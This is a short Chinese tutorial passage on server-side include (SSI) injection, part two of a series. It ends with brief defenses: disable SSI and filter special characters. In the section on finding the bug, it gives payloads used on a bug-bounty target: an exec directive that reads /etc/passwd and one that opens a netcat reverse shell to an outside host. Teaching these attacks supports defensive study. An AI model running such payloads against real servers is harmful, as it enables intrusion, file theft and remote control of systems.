web漏洞-SSI注入漏洞深入详解( 二 )


文章插图
使用exec执行服务端端命令
5.2 漏洞挖掘
运气好,刚好遇到个某SRC的 。
"-->'-->`--><<!--#exec cmd="cat /etc/passwd"-->
执行命令

web漏洞-SSI注入漏洞深入详解

文章插图
获取服务器端配置信息
 
"-->'-->`--><<!--#exec cmd="nc x.x.x.x 9090 -e /bin/bash"-->
反弹shell
web漏洞-SSI注入漏洞深入详解

文章插图
执行反弹shell
0x06 SSI防御
  • 关闭服务器SSI功能
  • 过滤相关SSI特殊字符(`<,>,#,-,",'`)
喜欢安全的朋友,可以关注并转发,私信我交流讨论




推荐阅读